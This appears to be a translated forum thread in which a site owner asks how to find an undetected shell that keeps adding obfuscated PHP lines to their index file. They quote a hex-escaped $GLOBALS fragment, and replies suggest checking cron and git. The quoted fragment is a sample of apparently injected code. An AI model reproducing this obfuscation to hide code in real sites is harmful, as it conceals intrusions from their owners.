Found a bunch of guides on the net ... but it doesn't help. All checks / searches using grep and find show that there is no shell. But vseravno every day there are changes in the index file ... such lines are added:

${"\x47\x4c\x4fB\x41\x4c\x53"}["n\x6b\x67l\x61\x6f\x77c"]="k\x77_\x61\x72\x72";${"\x47\x4cO\x42A\x4cS"}["a\x67\x6eei\x73\x73p\x63\x68\x66"]="\x6b\x77\x73";${"GL\x4f\x42\x41\x4c\x53"}["\x6a\x64\x78\x79\x71q\x6e\x77o"]="A\x72\x74i\x63l\x65\x5fca\x74egory";${"\x47LOB\x41\x4c\x53"}["\x67l\x6cz\x69\x73\x6d\x63\x74\x70\x68"]="c\x6f\x6e\x74e\x6et";${"\x47\x4c\x4fBALS"}["\x65d\x75s\x79e\x77\x6f"]="\x41\x72\x74\x69c\x6ce\x5f\x54\x69\x74l\x65";${"\x47L\x4f\x42A\x4c\x53"}["h\x6a\x68\x78h\x64\x72\x77"]="\x4dat\x65_\x44\x65s\x63\x72i\x70\x74ion";${"GL\x4fB\x41\x4c\x53"}["\x73\x64a\x6dy\x65u\x65"]="M\x61\x74\x65_\x4b\x65\x79\x77\x6fr\x64";${"\x47\x4c\x4f\x42ALS"}

How to find this shell? Manul and Aibolit did not help. I contacted those with support for vps, checked through my paid antivirus, but he also showed that the server is clean (while the index file still contained these lines) also checked through clamscan. The same result is zero. Maybe there are some other ways that I just could not find out?

  • So maybe not the server is infected, and in your browser is adding code to the page? Or even not in the browser, but along the path between the site and the computer, for example: in a router? - Visman
  • Not understood. The browser will add PHP lines to the file on the server ???? - Hasanagha Aliyev
  • :) I mistook, I was embarrassed by the initial $, my thoughts moved in the direction of jQuery. - Visman
  • 2
    How quickly does malicious code appear after it is removed? If it is fast, check the list of CRON jobs, maybe there is something for the crown. if there is nothing in the crown, then go is accessible from the web, initialize the git repositories in all your projects, check the file lists for suspicious ones, check in the changes and monitor which files change, this will allow you to find the left code in the future with one git status command - naym
  • 2
    Given the content of this text: ${"GLOBALS"}["nkglaowc"]="kw_arr";${"GLOBALS"}["agneisspchf"]="kws";${"GLOBALS"}["jdxyqqnwo"]="Article_category";${"GLOBALS"}["gllzismctph"]="content";${"GLOBALS"}["edusyewo"]="Article_Title";${"GLOBALS"}["hjhxhdrw"]="Mate_Description";${"GLOBALS"}["sdamyeue"]="Mate_Keyword";${"GLOBALS"} I would say that it does not write a shell or a virus but some CMS concerned about the security of its sources - Mike

0